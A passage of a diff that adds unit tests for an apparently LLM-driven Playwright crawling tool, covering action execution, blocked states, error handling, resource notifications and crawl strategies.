+        analysisId: context.testAnalysisId,
+        goal: "Explore",
+      });
+      expect(context.playwrightClient.type).toHaveBeenCalledWith("Input field", "e2", "hello", { submit: undefined, slowly: undefined });
+    });
+    it("executes navigate actions", async () => {
+      context.samplingClient.createMessage = vi.fn().mockResolvedValueOnce({
+        success: true,
+        data: {
+          actions: [{ tool: "navigate", args: { url: "https://shop.example.com/products" } }],
+          reasoning: "Navigating",
+          goalProgress: "Navigating",
+          goalComplete: false,
+        },
+      }).mockResolvedValueOnce({
+        success: true,
+        data: {
+          actions: [],
+          reasoning: "Done",
+          goalProgress: "Complete",
+          goalComplete: true,
+        },
+      });
+      await tool.handler({
+        analysisId: context.testAnalysisId,
+        goal: "Explore",
+      });
+      expect(context.playwrightClient.navigate).toHaveBeenCalledWith("https://shop.example.com/products");
+    });
+    it("records actions in workspace", async () => {
+      context.samplingClient.createMessage = vi.fn().mockResolvedValueOnce({
+        success: true,
+        data: {
+          actions: [{ tool: "click", args: { selector: "a" } }],
+          reasoning: "Clicking link",
+          goalProgress: "Exploring",
+          goalComplete: false,
+        },
+      }).mockResolvedValueOnce({
+        success: true,
+        data: {
+          actions: [],
+          reasoning: "Done",
+          goalProgress: "Complete",
+          goalComplete: true,
+        },
+      });
+      await tool.handler({
+        analysisId: context.testAnalysisId,
+        goal: "Explore",
+      });
+      expect(context.workspaceManager.recordAction).toHaveBeenCalled();
+    });
+  });
+  describe("handler - blocked state", () => {
+    beforeEach(async () => {
+      await context.playwrightClient.connect();
+    });
+    it("handles blocked response from sampling", async () => {
+      context.samplingClient.createMessage = vi.fn().mockResolvedValue({
+        success: true,
+        data: {
+          actions: [],
+          reasoning: "Cannot proceed",
+          goalProgress: "Blocked",
+          goalComplete: false,
+          blocked: true,
+          blockedReason: "Login required",
+        },
+      });
+      const result = await tool.handler({
+        analysisId: context.testAnalysisId,
+        goal: "Explore",
+      });
+      expect(result.isError).toBeFalsy();
+      const content = JSON.parse(result.content[0].text!);
+      expect(content.blocked).toBe(true);
+      expect(content.blockedReason).toBe("Login required");
+    });
+    it("handles sampling failure", async () => {
+      context.samplingClient.createMessage = vi.fn().mockResolvedValue({
+        success: false,
+        error: "LLM error",
+      });
+      const result = await tool.handler({
+        analysisId: context.testAnalysisId,
+        goal: "Explore",
+      });
+      expect(result.isError).toBeFalsy();
+      const content = JSON.parse(result.content[0].text!);
+      expect(content.blocked).toBe(true);
+    });
+  });
+  describe("handler - resource notifications", () => {
+    beforeEach(async () => {
+      context.samplingClient.createMessage = vi.fn().mockResolvedValue({
+        success: true,
+        data: {
+          actions: [],
+          reasoning: "Done",
+          goalProgress: "Complete",
+          goalComplete: true,
+        },
+      });
+      await context.playwrightClient.connect();
+    });
+    it("notifies on crawl creation", async () => {
+      vi.clearAllMocks();
+      await tool.handler({
+        analysisId: context.testAnalysisId,
+        goal: "Explore",
+      });
+      expect(context.resourceManager.notifyListChanged).toHaveBeenCalled();
+    });
+    it("notifies on page save", async () => {
+      context.samplingClient.createMessage = vi.fn().mockResolvedValueOnce({
+        success: true,
+        data: {
+          actions: [{ tool: "click", args: { selector: "a" } }],
+          reasoning: "Exploring",
+          goalProgress: "Exploring",
+          goalComplete: false,
+        },
+      }).mockResolvedValueOnce({
+        success: true,
+        data: {
+          actions: [],
+          reasoning: "Done",
+          goalProgress: "Complete",
+          goalComplete: true,
+        },
+      });
+      vi.clearAllMocks();
+      await tool.handler({
+        analysisId: context.testAnalysisId,
+        goal: "Explore",
+      });
+      // Multiple notifications: crawl create, page save, completion
+      expect(context.resourceManager.notifyListChanged).toHaveBeenCalled();
+    });
+  });
+  describe("handler - error handling", () => {
+    it("handles playwright connection errors", async () => {
+      context.playwrightClient.isConnected = vi.fn().mockReturnValue(false);
+      context.playwrightClient.connect = vi.fn().mockRejectedValue(
+        new Error("Connection failed")
+      );
+      const result = await tool.handler({
+        analysisId: context.testAnalysisId,
+        goal: "Explore",
+      });
+      expect(result.isError).toBe(true);
+      expect(result.content[0].text).toContain("Error");
+    });
+    it("handles navigation errors", async () => {
+      context.playwrightClient.navigate = vi.fn().mockRejectedValue(
+        new Error("Navigation timeout")
+      );
+      await context.playwrightClient.connect();
+      const result = await tool.handler({
+        analysisId: context.testAnalysisId,
+        goal: "Explore",
+      });
+      expect(result.isError).toBe(true);
+    });
+  });
+  describe("handler - strategy", () => {
+    beforeEach(async () => {
+      context.samplingClient.createMessage = vi.fn().mockResolvedValue({
+        success: true,
+        data: {
+          actions: [],
+          reasoning: "Done",
+          goalProgress: "Complete",
+          goalComplete: true,
+        },
+      });
+      await context.playwrightClient.connect();
+    });
+    it("accepts goal_directed strategy", async () => {
+      const result = await tool.handler({
+        analysisId: context.testAnalysisId,
+        goal: "Explore",
+        strategy: "goal_directed",
+      });
+      expect(result.isError).toBeFalsy();
+    });
+    it("accepts breadth_first strategy", async () => {
+      const result = await tool.handler({
+        analysisId: context.testAnalysisId,
+        goal: "Explore",
+        strategy: "breadth_first",
+      });
+      expect(result.isError).toBeFalsy();
+    });
+    it("accepts depth_first strategy", async () => {
+      const result = await tool.handler({
+        analysisId: context.testAnalysisId,
+        goal: "Explore",
+        strategy: "depth_first",
+      });
+      expect(result.isError).toBeFalsy();
+    });
+  });
+});